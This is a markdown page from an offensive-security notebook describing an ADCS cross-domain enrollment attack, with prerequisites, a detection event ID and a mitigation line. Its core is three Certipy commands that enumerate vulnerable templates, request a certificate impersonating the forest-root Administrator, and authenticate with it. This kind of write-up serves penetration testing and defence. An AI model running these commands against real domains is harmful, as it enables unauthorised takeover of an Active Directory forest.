attack-70-adcs-cross-domain-enrollment.md (2933B)
1 --- 2 title: "Attack #70 β ADCS Cross-Domain Enrollment" 3 description: "When ADCS is deployed in a multi-domain forest, certificate enrollment often uses Enterprise CAs that serve the entire forest. A user from a child domainβ¦" 4 category: active-directory 5 subcategory: "Trust Abuse" 6 tags: ["active-directory", "adcs", "hashing"] 7 tools: ["Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/πΆ Attack #70 β ADCS Cross-Domain Enrollment.md" 11 --- 12 # πΆ Attack #70 β ADCS Cross-Domain Enrollment 13 14 *** 15 16 ## π How It Works 17 18 When ADCS is deployed in a multi-domain forest, certificate enrollment often uses **Enterprise CAs** that serve the entire forest. A user from a child domain can enroll for certificates from the forest root's CA β and if a vulnerable template exists (ESC1-ESC8), they can request a certificate for any user in the forest, including Enterprise Admins in the root domain. This provides a **cross-domain escalation path** without needing the child domain's KRBTGT hash. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Enterprise CA serving multiple domains** | Standard in most multi-domain forests | 27 | **Vulnerable cert template** | ESC1/ESC2/ESC4 etc. accessible from child domain | 28 | **Child domain user credentials** | Any authenticated user | 29 30 *** 31 32 ## π» Full Commands 33 34 ```bash 35 # ββ Enumerate cross-domain CAs ββββββββββββββββββββββββββββββββββββββββββββββββ 36 certipy find -u user@child.corp.local -p 'Password1' -dc-ip 10.10.10.20 \ 37 -vulnerable -stdout 38 # Look for: CAs from parent domain with vulnerable templates 39 40 # ββ Exploit ESC1 cross-domain βββββββββββββββββββββββββββββββββββββββββββββββββ 41 certipy req -u user@child.corp.local -p 'Password1' -ca ROOT-CA \ 42 -template VulnTemplate -upn Administrator@corp.local \ 43 -dc-ip 10.10.10.10 -target ROOT-CA.corp.local 44 45 # ββ Authenticate as forest root Administrator βββββββββββββββββββββββββββββββββ 46 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 47 ``` 48 49 *** 50 51 ## π‘οΈ Detection β Event IDs 52 53 | Event ID | Source | What to Look For | 54 |---|---|---| 55 | **4886** | Security Log (CA) | Enrollment from child domain user targeting parent domain identity | 56 57 *** 58 59 ## π Attack Chain Context 60 61 ``` 62 [ADCS Cross-Domain] βββ Enroll for forest root cert from child domain 63 β 64 ββββ π No KRBTGT needed β pure ADCS escalation path 65 ββββ π Combines with ESC1-ESC8 from Category 4 66 ββββ π Defeated by: harden ADCS templates, restrict enrollment across domains 67 ``` 68 69 *** 70 71 > β **Attack #70 β ADCS Cross-Domain Enrollment complete.**